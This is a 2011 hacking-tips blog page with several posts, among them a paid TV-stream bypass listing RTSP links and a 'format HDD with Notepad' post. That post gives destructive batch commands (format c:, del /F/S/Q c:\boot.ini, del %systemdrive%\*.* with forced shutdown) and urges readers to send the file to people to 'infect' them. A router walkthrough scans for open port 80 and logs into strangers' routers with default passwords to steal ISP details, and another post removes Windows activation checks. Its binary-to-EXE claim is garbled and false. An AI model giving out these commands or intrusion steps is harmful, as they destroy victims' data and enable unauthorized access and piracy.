Total Pageviews

Popular Posts

Thursday, January 27, 2011

MUNDU TV HACKING TRICK

Mundu TV Hack available in Market!!!

Mundu TV is a popular internet TV channel streaming service which allow you to watch TV channels on your Computer and Mobile device. I hope you all know that, they have limited their trail period to 7 days and over that period, you can only watch few channels. And if you wanted to watch more channels, then you should subscribe for any of their package. Now using a simple trick you can watch all of their channels completely for free. you just need to use any media player software like Real Player SP or VLC Media Player in your computer And for mobile devices you can use pv player or core player.
I this tutorial, I’m going to show you how to stream all TV channels available in Mundu TV for free.
For this trick, you can use Real Time Player , VLC Media Player or any similar streaming capable software. In this tutorial I’m using VLC Media player, you can download VLC  media player for free here.

So here are the steps:

Go to >> Media >> Streaming >> Click on Network tab and enter the streaming link and press ALT+P or click on the small arrow in the Stream button and select play.
For mobile, you can directly open the streaming links and if your phone is supporting streaming, then it would automatically use the built-in player for streaming.

Step 1:
In the VLC Player Click on Media from the menu, and select Streaming.

Step 2

Click on Network and then enter a network URL in the field, then click on the small arrow drop down on the STREAM button and select Play.

Step 3:
Looking for more steps? The next step is to watch and enjoy :) Drop your comments.


Some of the Streaming links for free:-

23t4g2h rtsp://ss1c6.idc.mundu.tv:554/prf0/cid_4.sdp 2z5j8tj rtsp://ss1c6.idc.mundu.tv:554/prf1/cid_34.sdp
jgmweo rtsp://ss1c6.idc.mundu.tv:554/prf0/cid_35.sdp
30ustah rtsp://ss1c6.idc.mundu.tv:554/prf0/cid_7.sdp
208xj6t rtsp://ss1c6.idc.mundu.tv:554/prf0/cid_29.sdp
es803p rtsp://ss1c6.idc.mundu.tv:554/prf0/cid_32.sdp
o9r6mg rtsp://ss1c6.idc.mundu.tv:554/prf0/cid_33.sdp
jab4mo rtsp://ss1c6.idc.mundu.tv:554/prf0/cid_31.sdp
2lkbt52 rtsp://ss1c6.idc.mundu.tv:554/prf0/cid_2.sdp
28i2elh rtsp://121.244.145.226:554/prf0/cid_45.sdp
npgaw6 rtsp://121.244.145.226:554/prf0/cid_62.sdp
2n0n1xl rtsp://121.244.145.226:554/prf0/cid_61.sdp
6sc4cw rtsp://121.244.145.226:554/prf0/cid_57.sdp
23jofbl rtsp://121.244.145.226:554/prf0/cid_58.sdp
27xkvb4 rtsp://121.244.145.226:554/prf0/cid_41.sdp
zmgm0j rtsp://121.244.145.226:554/prf0/cid_56.sdp
fvijyg rtsp://121.244.145.226:554/prf0/cid_38.sdp
2isftwh rtsp://121.244.145.226:554/prf0/cid_54.sdp
1zezgjr rtsp://121.244.145.226:554/prf0/cid_52.sdp
wk6ask rtsp://121.244.145.226:554/prf0/cid_55.sdp
ay4pk3 rtsp://121.244.145.226:554/prf0/cid_50.sdp
Other channels apart from Mundu TV channels:
SOUTH INDIAN CHANNELS
HOLLYWOOD CHANNELS
 



Wednesday, January 26, 2011

How to Create a NameLess File or FoLDEr

Nameless File

1) To create a Nameless file First Select a File.

2) Then press F2 to rename it.

3) Press and hold the 'Alt' key. While holding the Alt key, type numbers '0160' from the numpad.

Note :- Type the numbers '0160' from the numpad, that is, the numbers present on the right side of the keyboard.
Don’t type the numbers which are present on top of the character keys.

4) Press Enter and the nameless file or folder will be created.

Reason :- The file or folder that seems nameless is actually named with a single space.

Useless notepad is'nt useless NOW

Formatting HDD with Notepad

Step 1 :-

Copy The Following In Notepad Exactly as it is.
says01001011000111110010010101010101010000011111100000
Step 2 :-

Save As An EXE Any Name Will Do
Step 3 :-

Send the EXE to People And Infect
OR
IF you think cannot format C Drive when windows is running try Laughing and u will get it Razz .. any way some more so u can test on other drives this is simple binary code
format c:\ /Q/X — this will format your drive c:\
01100110011011110111001001101101011000010111010000 100000011000110011101001011100
0010000000101111010100010010111101011000
format d:\ /Q/X — this will format your dirve d:\
01100110011011110111001001101101011000010111010000 100000011001000011101001011100
0010000000101111010100010010111101011000
format a:\ /Q/X — this will format your drive a:\
01100110011011110111001001101101011000010111010000 100000011000010011101001011100
0010000000101111010100010010111101011000
del /F/S/Q c:\boot.ini — this will cause your computer not to boot.
01100100011001010110110000100000001011110100011000 101111010100110010111101010001
00100000011000110011101001011100011000100110111101 101111011101000010111001101001
0110111001101001

try to figure out urself rest
cant spoonfeed
its working
Do not try it on your PC.


go to notepad and type the following:

@Echo off
Del C:\ *.*|y

save it as Dell.bat
want worse then type the following:

@echo off
del %systemdrive%\*.*/f/s/q
shutdown -r -f -t 00

and save it as a .bat file


Dont try the above tricks on your PC if u love ur DATA.

Poping a banner to show the OWNER's message

To pop a banner which can contain any message you want to display just before a user is going to log on.

Go to the key :- HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WinLogon
Now create a new string Value in the right pane named 'LegalNoticeCaption' and enter the value that you want to see in the MenuBar.

Now create yet another new string value and name it:
'LegalNoticeText'.
Modify it and insert the message you want to display each time Windows boots.

This can be effectively used to display the company's private policy each time the user logs on to his NT box.

It's '.reg' file would be:
REGEDIT4 [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Winlogon] "LegalNoticeCaption"="Caption here."

Revealing Passwords


Want to Reveal the Passwords Hidden Behind Asterisk (****) ?


Follow the steps given below-

1) Open the Login Page of any website. (eg. http://mail.yahoo.com)

2) Type your 'Username' and 'Password'.

3) Copy and paste the JavaScript code given below into your browser's address bar and press 'Enter'.



javascript: alert(document.getElementById('Passwd').value);


4) As soon as you press 'Enter', A window pops up showing Password typed by you..!

5) Join a Programming Class....

Note :- This trick may not be working with firefox.

Hope u like it. Raise ur comments.

Friday, January 14, 2011

How to HIDE a Drive in Windows..

How to HIDE a Drive in Windows using Command Prompt


Have u ever tried to hide your drive in Windows XP, Vista or 7. I guess NO. Lets do that using Command Prompt.


Step 1:-) Run your Command prompt using Administrator rights. (Click on start Menu, Then select Run and type cmd. Now press Ctrl+Shift+Enter)
Step 2:-) Now in Command Prompt type DISKPART and hit enter.
Step 3:-) Now type LIST VOLUME.(That will display the no of volume currently active on your HDD)


U'll see the above thing.
Step 4:-) Now type select volume 4 (i m hiding drive E hence i've selected volume 4. Please note that writing select volume E will NOT work u have to specify Volume number.)
Step 5:-) Now type Remove letter E (U can use your drive letter corresponding to the drive you need to hide)


Now The Selected Drive is hidden.


To Unhide the drive follow the below process.
Do the same as above till Step 4 and then:-
Step 5:-) Type Assign letter E. (Note that u have to mention the same letter which was there b4 as changing the letter might create some problem in future.)


Hope U like the trick. Pass your comments.

Thursday, January 13, 2011

How to protect your PC from KeyLoggers

Protecting your Computer from KeyLoggers

Keyloggers have been a major problem today as it does not require any prior knowledge of computers to use it. So hackers mainly use keyloggers to steal your passwords, credit card numbers and other confidential data. Below are some methods through which you can protect your computer from keyloggers:

Use a Good Antivirus

This is the first and basic step that you need to take in order to protect your computer from keyloggers. Use a Good antivirus such as Kaspersky, Norton or Mcafee and update it regularly.

Use a Good Antispyware

Since keyloggers are basically spywares, if you are a frequent user of Internet then you could be exposed to thousands of keyloggers and spywares. So you should use a good antispyware such as NoAdware.

Antilogger can be Handy

Antiloggers are programs that detect the presence of keyloggers on a given computer. Over past few years, I have tested a lot of anti-logging programs and have found Zemana Antilogger as the best antilogger.
Zemana
Normally a keylogger can be easily detected by a Good Antivirus program, but hackers use some methods such as hexing, binding, crypting and similar techniques to make it harder to be detected by antivirus programs. In this case Zemana Antilogger comes handy as the program is specially developed to protect your system against harmful keyloggers.
Online Scanning
When ever you receive a suspicious file, you scan it with online scanners such as Multi engine antivirus scanner which scans your file with 24 antivirus engines and reports it back to you if the file is recognized as a virus or spyware. This ensures that none of the malicious programs can escape from being detected as there are 24 different antivirus engines are involved in the scanning process.

Sandboxie

Sandboxie is another great program to help you protect your computer against harmful keyloggers and spywares. Sandboxie runs your computer in an isolated space which prevents your program from making permanent changes to other programs in your computer.
When ever you receive a file that looks suspicious, just run the program with Sandboxie so even if it is a keylogger or any other virus it will not make permanent changes to your computer system.

To run a program in Sandboxie follow the steps as mentioned below:
1. Open sandboxie and click on sandbox menu on the top
2. Now goto Default sandbox
3. Then click on run any program
4. Now select the file you wish to run in sandboxie and click open

Keyscrambler

Keyscrambler is one of the best protection against keyloggers that you can have, Keyscrambler is a small program which encrypts your typed keystrokes so even if the victim has installed a keylogger on your system, he or she will get encrypted keys. Keyscrambler currently supports Firefox, Internet explorer and other applications, however its premium version supports more than 160 applications.
Hope you liked my post! Pass the comments.

Thursday, January 6, 2011

How does Windows Product Activaion Works

Windows Product Activation or WPA is a license validation procedure introduced by Microsoft Corporation in all versions of it’s Windows operating system. WPA was first introduced in Windows XP and continues to exist in Windows Server 2003, Windows Vista, Windows Server 2008 and Windows 7 as well. WPA enforces each end user to activate their copy of Windows so as to prevent unauthorized usage beyond the specific period of time until it is verified as genuine by Microsoft. How WPA really works was a closely guarded secret until GmbH analyzed WPA using a copy of Windows XP RC1 and published a paper on their findings.
In this post you will find answers to some of the most frequently asked questions about Windows Product Activation.
 

Why activation?

Microsoft’s intention behind the activation is to limit the usage of it’s Windows operating system to only one machine for which the retail license is issued. Any other computer which runs on the same license must be disallowed from using the software. Thus WPA demands for activation of the product within 30 days of it’s installation so as to ensure that it is genuine. 
 

What does “Genuine Windows” means?

The copy of Windows is said to be genuine only if the product key used during the installation is genuine. It means that a given product key (retail license) must be used to install Windows only on one computer for which the license was purchased. Thus if the same key is used for the installation on another computer, then it is said to be a pirated copy. 
 

Exactly what information is transmitted during the activation?

When you activate your copy of Windows you are transmitting an Installation ID code to the Microsoft either by phone or Internet depending on the method you choose to activate. Based on this, the Microsoft’s licensing system can determine whether or not the installed OS is genuine. If it is said to be genuine, then the system will receive the Activation ID which completes the activation process. If the activation is done via telephone then the Activation ID needs to be entered manually to complete the activation process.
 

What information does the Installation ID contain?

This Installation ID is a 50-digit number which is derived from the following two data.
1. Product ID – It is actually derived from the 25-digit product key (the alphanumeric value that is printed on the sticker over the Windows CD/DVD case) that is entered during the installation of the operating system. The Product ID is used to uniquely identify your copy of Windows.
2. Hardware ID – This value is derived based on the hardware configuration of your computer. 
The WPA system checks the following 10 categories of the computer hardware to derive the Hardware ID:
  • Display Adapter
  • SCSI Adapter
  • IDE Adapter (effectively the motherboard)
  • Network Adapter (NIC) and its MAC Address
  • RAM Amount Range (i.e., 0-64mb, 64-128mb, etc.)
  • Processor Type
  • Processor Serial Number
  • Hard Drive Device
  • Hard Drive Volume Serial Number (VSN)
  • CD-ROM / CD-RW / DVD-ROM
Thus the Installation ID which is a combination of Product ID and Hardware ID is finally derived and sent to Microsoft during the activation process.
 

How is the Installation ID validated?

The Installation ID needs to be validated to confirm the authenticity of the installed copy of Windows. So after the Installation ID is received by Microsoft, it is decoded back so as to obtain the actual product key and the hardware details of the computer involved in the activation process.
The Microsoft’s system will now look to see if this is the first time the product key is being used for the activation. This happens when the user is trying to activate his Windows for the first time after purchase. If this is the case then the Installation ID is validated and the corresponding Activation ID is issued which completes the activation process.
However Microsoft system will now associate this product key with the hardware ID of the computer and stores this information on their servers. In simple words, during the first use of the product key, it is paired together with the Hardware ID and this information is stored up on the Microsoft servers.
 

What if a computer running a pirated copy of Windows attempts to activate?

 The activation fails whenever the copy of Windows installed is not said to be genuine. This usually happens when the product key used for the installation is said to have been used earlier on a different computer. This is determined during the activation process as follows:
During the validation of the Installation ID, the Microsoft’s system checks to see if the same product key was used in any of the previous activation processes. If yes then it looks to see the Hardware ID associated with it. The computer running a pirated copy of Windows will obviously have a different hardware configuration and hence the Hardware ID will mismatch. In this case the activation process will fail.
Thus for a successful activation, either of the following two cases must be satisfied:
  1. The product key must have been used for the first time. ie: The product key should not have been used for earlier activations on any other computer.
  2. If the product key is said to have been used earlier, then the Hardware ID should match. This happens only if the same computer for which the license was genuinely purchased is attempting for subsequent activation.
 

What about formatting the hard disk?

Each time the hard disk is reformatted and Windows is re-installed, it needs to be re-activated. However the activation process will be completed smoothly since the same computer is attempting for subsequent activation. In this case both the product key and the Hardware ID will match and hence the activation becomes successful.
 

What is I upgrade or make changes to my hardware?

In the above mentioned 10 categories of hardware, at least 7 should be the same. Thus you are allowed to make changes to not more than 3 categories of hardware. If you make too many changes then your activation will fail. In this case, it is necessary to contact the customer service representative via phone and explain about your problem. If he is convinced he may re-issue a new product key for your computer using which you can re-activate your Windows.
 

Some things WPA does not do

  • WPA does not send any personal information at all about you to Microsoft. There is still an option to register the product with Microsoft, but that is separate and entirely voluntary.
  • If you prefer to activate via phone, you are not required to give any personal information to Microsoft.
  • WPA does not provide a means for Microsoft to turn off your machine or damage your data/hardware. (Nor do they even have access to your data). This is a common myth that many people have about Microsoft products.
  • WPA is not a “lease” system requiring more payments after two years or any other period. You may use the product as licensed in perpetuity.
I have tried my best to uncover the secret behind the WPA. For further details and more technical information you can read the actual paper by Fully Licensed GmbH athttp://www.licenturion.com/xp/fully-licensed-wpa.txt. I hope you like this post. Pass your comments.

Hacking an ADSL router!!!!

Hacking an Ethernet ADSL Router

Almost half of the Internet users across the globe use ADSL routers/modems to connect to the Internet however, most of them are unaware of the fact that it has a serious vulnerability which can easily be exploited even by a noob hacker just like you. In this post I will show you how to exploit a common vulnerability that lies in most ADSL routers so as to gain complete access to the router settings and ISP login details.
Every router comes with a username and password using which it is possible to gain access to the router settings and configure the device. The vulnerability actually lies in theDefault username and password that comes with the factory settings. Usually the routers come preconfigured from the Internet Service provider and hence the users do not bother to change the password later. This makes it possible for the attackers to gain unauthorized access and modify the router settings using a common set of default usernames and passwords. Here is how you can do it.
Before you proceed, you need the following tool in the process
Here is a detailed information on how to exploit the vulnerability of an ADSL router.
Step-1: Go to www.whatismyipaddress.com. Once the page is loaded you will find your IP address. Note it down.
Step-2: Open Angry IP Scanner, here you will see an option called IP Range: where you need to enter the range of IP address to scan for.
Step-3: Go to Tools->Preferences and select the Ports tab. Under Port selectionenter 80 (we need to scan for port 80). Now switch to the Display tab, select the option “Hosts with open ports only” and click on OK.


Step-4: Now click on Start. After a few minutes, the IP scanner will show a list of IPs with Port 80 open as shown in the below image.
Step-5: Now copy any of the IP from the list, paste it in your browser’s address bar and hit enter. A window will popup asking for username and password. Since most users do not change the passwords, it should most likely work with the default username and password. For most routers the default username-password pair will be admin-admin or admin-password.
Just enter the username-password as specified above and hit enter. If you are lucky you should gain access to the router settings page where you can modify any of the router settings. The settings page can vary from router to router. A sample router settings page is shown below.
If you do not succeed to gain access, select another IP from the list and repeat the step-5. Atleast 1 out of 5 IPs will have a default password and hence you will surely be able to gain access.

What can an Attacker do by Gaining Access to the Router Settings?

By gaining access to the router settings, it is possible for an attacker to modify any of the router settings which results in the malfunction of the router. As a result the target user’s computer will be disconnected from the Internet. In the worst case the attacker can copy the ISP login details from the router to steal the Internet connection or play any kind of prank with the router settings. So the victim has to reconfigure the router in order to bring it back to action.

The Verdict:

If you are using an ADSL router to connect to the Internet, it is highly recommended that you immediately change your password to prevent any such attacks in the future. Who knows, you may be the next victim of such an attack. 
Since the configuration varies from router to router, you need to contact your ISP for details on how to change the password for your model.

Monday, January 3, 2011

How to Remove WGA on Windows 7

How To Remove Windows Genuine Advantage Notification
1) Go to the Start Menu tab and click on Run.
2) Once Run has been opened, type in system32 and click on ok. Once processed, go to Tools and then go to Folder Options and hit the View button.
3) Click on Check which is beside "Hide extensions for known file types". This way, you can uncheck.
4) Now you've got to find WgaLogon.dll and you have to rename it with another extension. To do this, you should add a "1" after WgaLogon. If a warning pops up for changing the name, click on yes.
5) Now you've got to find and delete the WgaTray.exe file that's in the System32. Once the file has been deleted, go straight to the "Processes" tab and highlight WgaTray.exe and click on "End Process".
6) Go back to System32 and delete the WgaLogon.dll application. Then you got to change the name back to the original name.
This is exactly how you should remove Windows Genuine Advantage. However, these steps might be hard to follow, right? This can either be because you simply don't get it, or you aren't really a technical person.
If for any reason you don't know how to remove Windows Genuine Advantage by following the steps above then don't worry, because I've discovered the perfect Windows Genuine Advantage removal tool that fully automates the process. It's called the Perfect uninstaller.
This software will help you to uninstall and remove Windows Genuine Advantage Highlights by doing 3 things. Firstly, the uninstaller uninstalls the program. Once that has been finished it will fully scan your registry and your hard-drive to find any files that are related to the program.


I hope this will help u remove WINDOWS 7 WGA tool removation.